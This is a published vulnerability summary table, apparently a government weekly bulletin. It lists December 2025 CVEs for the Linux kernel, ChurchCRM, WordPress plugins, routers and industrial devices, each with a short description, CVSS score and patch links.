| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to detect potential corrupted nid in free_nid_list As reported, on-disk footer.ino and footer.nid is the same and out-of-range, let's add sanity check on f2fs_alloc_nid() to detect any potential corruption in free_nid_list. | 2025-12-16 | not yet calculated | CVE-2025-68315 | https://git.kernel.org/stable/c/6b9525596a83cd5b7bbc2c7bd5f9ad9cf5ad60fa https://git.kernel.org/stable/c/adbcb34f03abb89e681a5907c4c3ce4bf224991d https://git.kernel.org/stable/c/8fc6056dcf79937c46c97fa4996cda65956437a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix invalid probe error return value After DME Link Startup, the error return value is set to the MIPI UniPro GenericErrorCode which can be 0 (SUCCESS) or 1 (FAILURE). Upon failure during driver probe, the error code 1 is propagated back to the driver probe function which must return a negative value to indicate an error, but 1 is not negative, so the probe is considered to be successful even though it failed. Subsequently, removing the driver results in an oops because it is not in a valid state. This happens because none of the callers of ufshcd_init() expect a non-negative error code. Fix the return value and documentation to match actual usage. | 2025-12-16 | not yet calculated | CVE-2025-68316 | https://git.kernel.org/stable/c/df96dbe1af7f6591c09f862f1226d3619b07e1b6 https://git.kernel.org/stable/c/a2b32bc1d9e359a9f90d0de6af16699facb10935 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zctx: check chained notif contexts Send zc only links ubuf_info for requests coming from the same context. There are some ambiguous syz reports, so let's check the assumption on notification completion. | 2025-12-16 | not yet calculated | CVE-2025-68317 | https://git.kernel.org/stable/c/aaafd17d3f4be2c15539359a5b4bfa00237f687f https://git.kernel.org/stable/c/d664a3ce3a604231a0b144c152a3755d03b18b60 https://git.kernel.org/stable/c/ab3ea6eac5f45669b091309f592c4ea324003053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: thead: th1520-ap: set all AXI clocks to CLK_IS_CRITICAL The AXI crossbar of TH1520 has no proper timeout handling, which means gating AXI clocks can easily lead to bus timeout and thus system hang. Set all AXI clock gates to CLK_IS_CRITICAL. All these clock gates are ungated by default on system reset. In addition, convert all current CLK_IGNORE_UNUSED usage to CLK_IS_CRITICAL to prevent unwanted clock gating. | 2025-12-16 | not yet calculated | CVE-2025-68318 | https://git.kernel.org/stable/c/bdec5e01fc2f3114d1fb1daeb1000911d783c4ae https://git.kernel.org/stable/c/c567bc5fc68c4388c00e11fc65fd14fe86b52070 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netconsole: Acquire su_mutex before navigating configs hierarchy There is a race between operations that iterate over the userdata cg_children list and concurrent add/remove of userdata items through configfs. The update_userdata() function iterates over the nt->userdata_group.cg_children list, and count_extradata_entries() also iterates over this same list to count nodes. Quoting from Documentation/filesystems/configfs.rst: > A subsystem can navigate the cg_children list and the ci_parent pointer > to see the tree created by the subsystem. This can race with configfs' > management of the hierarchy, so configfs uses the subsystem mutex to > protect modifications. Whenever a subsystem wants to navigate the > hierarchy, it must do so under the protection of the subsystem > mutex. Without proper locking, if a userdata item is added or removed concurrently while these functions are iterating, the list can be accessed in an inconsistent state. For example, the list_for_each() loop can reach a node that is being removed from the list by list_del_init() which sets the nodes' .next pointer to point to itself, so the loop will never end (or reach the WARN_ON_ONCE in update_userdata() ). Fix this by holding the configfs subsystem mutex (su_mutex) during all operations that iterate over cg_children. This includes: - userdatum_value_store() which calls update_userdata() to iterate over cg_children - All sysdata_*_enabled_store() functions which call count_extradata_entries() to iterate over cg_children The su_mutex must be acquired before dynamic_netconsole_mutex to avoid potential lock ordering issues, as configfs operations may already hold su_mutex when calling into our code. | 2025-12-16 | not yet calculated | CVE-2025-68319 | https://git.kernel.org/stable/c/ff70aa7e8cf05745fdba7258952a8bedf33ea336 https://git.kernel.org/stable/c/d7d2fcf7ae31471b4e08b7e448b8fd0ec2e06a1b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lan966x: Fix sleeping in atomic context The following warning was seen when we try to connect using ssh to the device. BUG: sleeping function called from invalid context at kernel/locking/mutex.c:575 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear preempt_count: 1, expected: 0 INFO: lockdep is turned off. CPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE Tainted: [W]=WARN Hardware name: Generic DT based system Call trace: unwind_backtrace from show_stack+0x10/0x14 show_stack from dump_stack_lvl+0x7c/0xac dump_stack_lvl from __might_resched+0x16c/0x2b0 __might_resched from __mutex_lock+0x64/0xd34 __mutex_lock from mutex_lock_nested+0x1c/0x24 mutex_lock_nested from lan966x_stats_get+0x5c/0x558 lan966x_stats_get from dev_get_stats+0x40/0x43c dev_get_stats from dev_seq_printf_stats+0x3c/0x184 dev_seq_printf_stats from dev_seq_show+0x10/0x30 dev_seq_show from seq_read_iter+0x350/0x4ec seq_read_iter from seq_read+0xfc/0x194 seq_read from proc_reg_read+0xac/0x100 proc_reg_read from vfs_read+0xb0/0x2b0 vfs_read from ksys_read+0x6c/0xec ksys_read from ret_fast_syscall+0x0/0x1c Exception stack(0xf0b11fa8 to 0xf0b11ff0) 1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001 1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001 1fe0: 0005404c be9048c0 00018684 b6ec2cd8 It seems that we are using a mutex in a atomic context which is wrong. Change the mutex with a spinlock. | 2025-12-16 | not yet calculated | CVE-2025-68320 | https://git.kernel.org/stable/c/5a5d2f7727752b64d13263eacd9f8d08a322e662 https://git.kernel.org/stable/c/c8ab03aa5bd9fd8bfe5d9552d8605826759fdd4d https://git.kernel.org/stable/c/3ac743c60ec502163c435712d527eeced8d83348 https://git.kernel.org/stable/c/0216721ce71252f60d89af49c8dff613358058d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: page_pool: always add GFP_NOWARN for ATOMIC allocations Driver authors often forget to add GFP_NOWARN for page allocation from the datapath. This is annoying to users as OOMs are a fact of life, and we pretty much expect network Rx to hit page allocation failures during OOM. Make page pool add GFP_NOWARN for ATOMIC allocations by default. | 2025-12-16 | not yet calculated | CVE-2025-68321 | https://git.kernel.org/stable/c/0ec2cd5c58793d0c622797cd5fbe26634b357210 https://git.kernel.org/stable/c/9835a0fd59a1df5ec0740fdab6d50db68e0f10de https://git.kernel.org/stable/c/7613c06ffa89c1e2266fb532e23ef7dfdf269d73 https://git.kernel.org/stable/c/3671a0775952026228ae44e096eb144bca75f8dc https://git.kernel.org/stable/c/ab48dc0e23eb714b3f233f8e8f6deed7df2051f5 https://git.kernel.org/stable/c/f3b52167a0cb23b27414452fbc1278da2ee884fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: parisc: Avoid crash due to unaligned access in unwinder Guenter Roeck reported this kernel crash on his emulated B160L machine: Starting network: udhcpc: started, v1.36.1 Backtrace: [<104320d4>] unwind_once+0x1c/0x5c [<10434a00>] walk_stackframe.isra.0+0x74/0xb8 [<10434a6c>] arch_stack_walk+0x28/0x38 [<104e5efc>] stack_trace_save+0x48/0x5c [<105d1bdc>] set_track_prepare+0x44/0x6c [<105d9c80>] ___slab_alloc+0xfc4/0x1024 [<105d9d38>] __slab_alloc.isra.0+0x58/0x90 [<105dc80c>] kmem_cache_alloc_noprof+0x2ac/0x4a0 [<105b8e54>] __anon_vma_prepare+0x60/0x280 [<105a823c>] __vmf_anon_prepare+0x68/0x94 [<105a8b34>] do_wp_page+0x8cc/0xf10 [<105aad88>] handle_mm_fault+0x6c0/0xf08 [<10425568>] do_page_fault+0x110/0x440 [<10427938>] handle_interruption+0x184/0x748 [<11178398>] schedule+0x4c/0x190 BUG: spinlock recursion on CPU#0, ifconfig/2420 lock: terminate_lock.2+0x0/0x1c, .magic: dead4ead, .owner: ifconfig/2420, .owner_cpu: 0 While creating the stack trace, the unwinder uses the stack pointer to guess the previous frame to read the previous stack pointer from memory. The crash happens, because the unwinder tries to read from unaligned memory and as such triggers the unalignment trap handler which then leads to the spinlock recursion and finally to a deadlock. Fix it by checking the alignment before accessing the memory. | 2025-12-16 | not yet calculated | CVE-2025-68322 | https://git.kernel.org/stable/c/9ac1f44723f26881b9fe7e69c7bc25397b879155 https://git.kernel.org/stable/c/009270208f76456c2cefcd565da263b90bb2eadb https://git.kernel.org/stable/c/fd9f30d1038ee1624baa17a6ff11effe5f7617cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: ucsi: fix use-after-free caused by uec->work The delayed work uec->work is scheduled in gaokun_ucsi_probe() but never properly canceled in gaokun_ucsi_remove(). This creates use-after-free scenarios where the ucsi and gaokun_ucsi structure are freed after ucsi_destroy() completes execution, while the gaokun_ucsi_register_worker() might be either currently executing or still pending in the work queue. The already-freed gaokun_ucsi or ucsi structure may then be accessed. Furthermore, the race window is 3 seconds, which is sufficiently long to make this bug easily reproducible. The following is the trace captured by KASAN: ================================================================== BUG: KASAN: slab-use-after-free in __run_timers+0x5ec/0x630 Write of size 8 at addr ffff00000ec28cc8 by task swapper/0/0 ... Call trace: show_stack+0x18/0x24 (C) dump_stack_lvl+0x78/0x90 print_report+0x114/0x580 kasan_report+0xa4/0xf0 __asan_report_store8_noabort+0x20/0x2c __run_timers+0x5ec/0x630 run_timer_softirq+0xe8/0x1cc handle_softirqs+0x294/0x720 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x1c call_on_irq_stack+0x30/0x48 do_softirq_own_stack+0x1c/0x28 __irq_exit_rcu+0x27c/0x364 irq_exit_rcu+0x10/0x1c el1_interrupt+0x40/0x60 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 arch_local_irq_enable+0x4/0x8 (P) do_idle+0x334/0x458 cpu_startup_entry+0x60/0x70 rest_init+0x158/0x174 start_kernel+0x2f8/0x394 __primary_switched+0x8c/0x94 Allocated by task 72 on cpu 0 at 27.510341s: kasan_save_stack+0x2c/0x54 kasan_save_track+0x24/0x5c kasan_save_alloc_info+0x40/0x54 __kasan_kmalloc+0xa0/0xb8 __kmalloc_node_track_caller_noprof+0x1c0/0x588 devm_kmalloc+0x7c/0x1c8 gaokun_ucsi_probe+0xa0/0x840 auxiliary_bus_probe+0x94/0xf8 really_probe+0x17c/0x5b8 __driver_probe_device+0x158/0x2c4 driver_probe_device+0x10c/0x264 __device_attach_driver+0x168/0x2d0 bus_for_each_drv+0x100/0x188 __device_attach+0x174/0x368 device_initial_probe+0x14/0x20 bus_probe_device+0x120/0x150 device_add+0xb3c/0x10fc __auxiliary_device_add+0x88/0x130 ... Freed by task 73 on cpu 1 at 28.910627s: kasan_save_stack+0x2c/0x54 kasan_save_track+0x24/0x5c __kasan_save_free_info+0x4c/0x74 __kasan_slab_free+0x60/0x8c kfree+0xd4/0x410 devres_release_all+0x140/0x1f0 device_unbind_cleanup+0x20/0x190 device_release_driver_internal+0x344/0x460 device_release_driver+0x18/0x24 bus_remove_device+0x198/0x274 device_del+0x310/0xa84 ... The buggy address belongs to the object at ffff00000ec28c00 which belongs to the cache kmalloc-512 of size 512 The buggy address is located 200 bytes inside of freed 512-byte region The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x4ec28 head: order:2 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0x3fffe0000000040(head|node=0|zone=0|lastcpupid=0x1ffff) page_type: f5(slab) raw: 03fffe0000000040 ffff000008801c80 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 03fffe0000000040 ffff000008801c80 dead000000000122 0000000000000000 head: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 03fffe0000000002 fffffdffc03b0a01 00000000ffffffff 00000000ffffffff head: ffffffffffffffff 0000000000000000 00000000ffffffff 0000000000000004 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff00000ec28b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff00000ec28c00: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff00000ec28c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff00000ec28d00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff00000ec28d80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================ ---truncated--- | 2025-12-18 | not yet calculated | CVE-2025-68323 | https://git.kernel.org/stable/c/d8ac85c76a4279979b917d4b2f9c6b07d9783003 https://git.kernel.org/stable/c/a880ef71a1c8da266b88491213c37893e2126489 https://git.kernel.org/stable/c/2b7a0f47aaf2439d517ba0a6b29c66a535302154 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: imm: Fix use-after-free bug caused by unfinished delayed work The delayed work item 'imm_tq' is initialized in imm_attach() and scheduled via imm_queuecommand() for processing SCSI commands. When the IMM parallel port SCSI host adapter is detached through imm_detach(), the imm_struct device instance is deallocated. However, the delayed work might still be pending or executing when imm_detach() is called, leading to use-after-free bugs when the work function imm_interrupt() accesses the already freed imm_struct memory. The race condition can occur as follows: CPU 0(detach thread) | CPU 1 | imm_queuecommand() | imm_queuecommand_lck() imm_detach() | schedule_delayed_work() kfree(dev) //FREE | imm_interrupt() | dev = container_of(...) //USE dev-> //USE Add disable_delayed_work_sync() in imm_detach() to guarantee proper cancellation of the delayed work item before imm_struct is deallocated. | 2025-12-18 | not yet calculated | CVE-2025-68324 | https://git.kernel.org/stable/c/31ab2aad7a7b7501e904a09bf361e44671f66092 https://git.kernel.org/stable/c/48dd41fa2d6c6a0c50e714deeba06ffe7f91961b https://git.kernel.org/stable/c/9e434426cc23ad5e2aad649327b59aea00294b13 https://git.kernel.org/stable/c/ab58153ec64fa3fc9aea09ca09dc9322e0b54a7c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop In cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen and backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes that the parent qdisc will enqueue the current packet. However, this assumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent qdisc stops enqueuing current packet, leaving the tree qlen/backlog accounting inconsistent. This mismatch can lead to a NULL dereference (e.g., when the parent Qdisc is qfq_qdisc). This patch computes the qlen/backlog delta in a more robust way by observing the difference before and after the series of cake_drop() calls, and then compensates the qdisc tree accounting if cake_enqueue() returns NET_XMIT_CN. To ensure correct compensation when ACK thinning is enabled, a new variable is introduced to keep qlen unchanged. | 2025-12-18 | not yet calculated | CVE-2025-68325 | https://git.kernel.org/stable/c/0b6216f9b3d1c33c76f74511026e5de5385ee520 https://git.kernel.org/stable/c/529c284cc2815c8350860e9a31722050fe7117cb https://git.kernel.org/stable/c/3ed6c458530a547ed0c9ea0b02b19bab620be88b https://git.kernel.org/stable/c/9fefc78f7f02d71810776fdeb119a05a946a27cc |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.4, there is a Stored Cross-Site Scripting (XSS) vulnerability within the GroupEditor.php page of the application. When a user attempts to create a group role, they can execute malicious JavaScript. However, for this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68399 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A SQL Injection vulnerability exists in the legacy endpoint `/Reports/ConfirmReportEmail.php` in ChurchCRM prior to version 6.5.3. Although the feature was removed from the UI, the file remains deployed and reachable directly via URL. This is a classic case of *dead but reachable code*. Any authenticated user - including one with zero assigned permissions - can exploit SQL injection through the `familyId` parameter. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68400 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v54g-2pvg-gvp2 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.0.0, the application stores user-supplied HTML/JS without sufficient sanitization/encoding. When other users later view this content, attacker-controlled JavaScript executes in their browser (stored XSS). In affected contexts the script can access web origin data and perform privileged actions as the victim. Where session cookies are not marked HttpOnly, the script can read document.cookie, enabling session theft and account takeover. Version 6.0.0 patches the issue. | 2025-12-17 | not yet calculated | CVE-2025-68401 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-phfw-p278-qq7v |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available. | 2025-12-19 | not yet calculated | CVE-2025-68430 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx https://github.com/cvat-ai/cvat/commit/2c24ef0c3f8fd94f6c71cff4eafcf11bfcaa5f91 |
| boscop-fr--orejime | Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code. | 2025-12-19 | not yet calculated | CVE-2025-68457 | https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384 https://github.com/boscop-fr/orejime/issues/142 https://github.com/boscop-fr/orejime/pull/143 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.1-14, ImageMagick crashes when processing a crafted TIFF file. Version 7.1.1-14 fixes the issue. | 2025-12-18 | not yet calculated | CVE-2025-68469 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fff3-4rp7-px97 |
| TP-Link Systems Inc.--Tapo C200 V3 | A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. An unauthenticated attacker on the same local network segment can send specially crafted SOAP XML requests, causing memory overflow and device crash, resulting in denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-8065 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
Vulnerability Summary for the Week of December 8, 2025
Posted on Monday December 15, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Unknown--Typora | Typora 1.7.4 contains a command injection vulnerability in the PDF export preferences that allows attackers to execute arbitrary system commands. Attackers can inject malicious commands into the 'run command' input field during PDF export to achieve remote code execution. | 2025-12-12 | 9.8 | CVE-2024-14010 | ExploitDB-51752 Typora Vendor Homepage VulnCheck Advisory: Typora 1.7.4 OS Command Injection via Export PDF Preferences |
| PCMan--FTP Server | PCMan FTP Server 2.0 contains a buffer overflow vulnerability in the 'pwd' command that allows remote attackers to execute arbitrary code. Attackers can send a specially crafted payload during the FTP login process to overwrite memory and potentially gain system access. | 2025-12-12 | 9.8 | CVE-2024-58299 | ExploitDB-51767 PCMan FTP Server Sourceforge Page VulnCheck Advisory: PCMan FTP Server 2.0 Remote Buffer Overflow via 'pwd' Command |
| dormakaba--Dormakaba Saflok System 6000 | Dormakaba Saflok System 6000 contains a predictable key generation algorithm that allows attackers to derive card access keys from a 32-bit unique identifier. Attackers can exploit the deterministic key generation process by calculating valid access keys using a simple mathematical transformation of the card's unique identifier. | 2025-12-12 | 9.8 | CVE-2024-58311 | ExploitDB-51832 Dormakaba Vendor Homepage VulnCheck Advisory: Dormakaba Saflok System 6000 Key Generation Cryptographic Weakness |
| Ivanti--Endpoint Manager | Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required. | 2025-12-09 | 9.6 | CVE-2025-10573 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| rupok98--URL Shortener Plugin For WordPress | The URL Shortener Plugin For WordPress plugin for WordPress is vulnerable to SQL Injection via the 'analytic_id' parameter in all versions up to, and including, 3.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 9.8 | CVE-2025-10738 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b4acf11-114a-4e97-89cd-1d387f14a730?source=cve https://plugins.trac.wordpress.org/browser/exact-links/trunk/app/Models/LinkAnalytics.php?rev=3210852 https://wordpress.org/plugins/exact-links/ |
| Personal Project--Panilux | Cross-Site Request Forgery (CSRF) vulnerability in Personal Project Panilux allows Cross Site Request Forgery. This CSRF vulnerability resulting in Command Injection has been identified. This issue affects Panilux: before v.0.10.0. NOTE: The vendor was contacted and responded that they deny ownership of the mentioned product. | 2025-12-09 | 9.6 | CVE-2025-11022 | https://www.usom.gov.tr/bildirim/tr-25-0433 |
| recorp--Export WP Pages to HTML & PDF Simply Create a Static Website | The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.' | 2025-12-13 | 9.8 | CVE-2025-11693 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cd28ac3c-aaef-49e3-843d-8532404703c9?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388166%40export-wp-page-to-static-html&new=3388166%40export-wp-page-to-static-html&sfp_email=&sfph_mail= |
| TalentSoft Software--UNIS | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TalentSoft Software UNIS allows SQL Injection. This issue affects UNIS: before 42321. | 2025-12-09 | 9.8 | CVE-2025-12504 | https://www.usom.gov.tr/bildirim/tr-25-0435 |
| lazycoders--LazyTasks Project & Task Management with Collaboration, Kanban and Gantt Chart | The LazyTasks - Project & Task Management with Collaboration, Kanban and Gantt Chart plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.29. This is due to the plugin not properly validating a user's identity via the 'wp-json/lazytasks/api/v1/user/role/edit/' REST API endpoint prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. It is also possible for attackers to abuse this endpoint to grant users with access to additional roles within the plugin | 2025-12-12 | 9.8 | CVE-2025-12963 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6998185-0f9b-48ab-9dca-05adf5ae603a?source=cve https://wordpress.org/plugins/lazytasks-project-task-management/ |
| D-Link--DCS-F5614-L1 | A malicious actor can access camera configuration information, including account credentials, without authenticating when accessing a vulnerable URL. | 2025-12-10 | 9.4 | CVE-2025-13607 | url https://www.cisa.gov/news-events/ics-advisories/icsa-25-343-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-343-03.json |
| Elated Themes--Elated Membership | The Elated Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.2. This is due to the plugin not properly logging in a user with the data that was previously verified through the 'eltdf_membership_check_facebook_user' and the 'eltdf_membership_login_user_from_social_network' function. This makes it possible for unauthenticated attackers to log in as administrative users, as long as they have an existing account on the site which can easily be created by default through the temp user functionality, and access to the administrative user's email. | 2025-12-10 | 9.8 | CVE-2025-13613 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f15dbce4-2e94-4735-b62b-e32d923c51ce?source=cve https://themeforest.net/item/esmarts-a-modern-education-and-lms-theme/20987760 |
| ApusTheme--WP CarDealer | The WP CarDealer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.2.16. This is due to the 'WP_CarDealer_User::process_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-12-11 | 9.8 | CVE-2025-13764 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4893d9c-e039-43df-80b9-dbe42374caed?source=cve https://themeforest.net/item/boxcar-automotive-car-dealer-wordpress-theme/49741717 |
| pgadmin.org--pgAdmin 4 | pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data. | 2025-12-11 | 9.1 | CVE-2025-13780 | https://github.com/pgadmin-org/pgadmin4/issues/9368 |
| ConnectWise--ScreenConnect | In versions of ScreenConnect™ prior to 25.8, server-side validation and integrity checks within the extension subsystem could allow the installation and execution of untrusted or arbitrary extensions by authorized or administrative users. Abuse of this behavior could result in the execution of custom code on the server or unauthorized access to application configuration data. This issue affects only the ScreenConnect server component; host and guest clients are not impacted. ScreenConnect 25.8 introduces enhanced server-side configuration handling and integrity checks to ensure only trusted extensions can be installed. | 2025-12-11 | 9.1 | CVE-2025-14265 | https://www.connectwise.com/company/trust/security-bulletins/screenconnect-2025.8-security-patch |
| sh1zen--Multi Uploader for Gravity Forms | The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'plupload_ajax_delete_file' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. | 2025-12-12 | 9.8 | CVE-2025-14344 | https://www.wordfence.com/threat-intel/vulnerabilities/id/346af237-0411-4cc4-9544-eab697385a2f?source=cve https://plugins.trac.wordpress.org/browser/gf-multi-uploader/tags/1.1.7/inc/GFMUHandlePluploader.class.php?marks=41-43#L41 |
| jayarsiech--JAY Login & Register | The JAY Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.4.01. This is due to incorrect authentication checking in the 'jay_login_register_process_switch_back' function with the 'jay_login_register_process_switch_back' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. | 2025-12-13 | 9.8 | CVE-2025-14440 | https://www.wordfence.com/threat-intel/vulnerabilities/id/928877a6-eeeb-4ed5-900b-9b1560e1bf87?source=cve https://plugins.trac.wordpress.org/browser/jay-login-register/tags/2.4.01/includes/jay-login-register-user-switching.php#L98 |
| UTT-- 512W | A vulnerability was determined in UTT 进取 512W up to 3.1.7.7-171114. This impacts the function strcpy of the file /goform/formNatStaticMap of the component Endpoint. Executing manipulation of the argument NatBind can lead to buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 9.8 | CVE-2025-14534 | VDB-335873 | UTT 进取 512W Endpoint formNatStaticMap strcpy buffer overflow VDB-335873 | CTI Indicators (IOB, IOC, IOA) Submit #703620 | UTT / 艾泰 Aggressive 512W <= v3.1.7.7-171114 Buffer Overflow / Memory Corruption https://github.com/maximdevere/CVE2/issues/6 |
| UTT-- 512W | A vulnerability was identified in UTT 进取 512W up to 3.1.7.7-171114. Affected is the function strcpy of the file /goform/formConfigFastDirectionW. The manipulation of the argument ssid leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 9.8 | CVE-2025-14535 | VDB-335874 | UTT 进取 512W formConfigFastDirectionW strcpy buffer overflow VDB-335874 | CTI Indicators (IOB, IOC, IOA) Submit #703621 | UTT / 艾泰 Aggressive 512W <= v3.1.7.7-171114 Buffer Overflow / Memory Corruption https://github.com/maximdevere/CVE2/issues/7 |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/DhcpListClient of the component HTTP Request Handler. The manipulation of the argument page results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-14 | 9.8 | CVE-2025-14665 | VDB-336397 | Tenda WH450 HTTP Request DhcpListClient stack-based overflow VDB-336397 | CTI Indicators (IOB, IOC, IOA) Submit #714400 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/DhcpListClient/DhcpListClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/DhcpListClient/DhcpListClient.md#reproduce https://www.tenda.com.cn/ |
| Infinera--MTC-9 | Remote shell service (RSH) in Infinera MTC-9 version R22.1.1.0275 allows an attacker to utilize password-less user accounts and obtain system access by activating a reverse shell. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 9.8 | CVE-2025-27019 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27019 |
| Infinera--MTC-9 | Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on file system . This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 9.8 | CVE-2025-27020 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27020 |
| WAGO--Indsutrial-Managed-Switches | An unauthenticated remote attacker can abuse unsafe sscanf calls within the check_account() function to write arbitrary data into fixed-size stack buffers which leads to full device compromise. | 2025-12-10 | 9.8 | CVE-2025-41730 | https://certvde.com/de/advisories/VDE-2025-095 |
| WAGO--Indsutrial-Managed-Switches | An unauthenticated remote attacker can abuse unsafe sscanf calls within the check_cookie() function to write arbitrary data into fixed-size stack buffers which leads to full device compromise. | 2025-12-10 | 9.8 | CVE-2025-41732 | https://certvde.com/de/advisories/VDE-2025-095 |
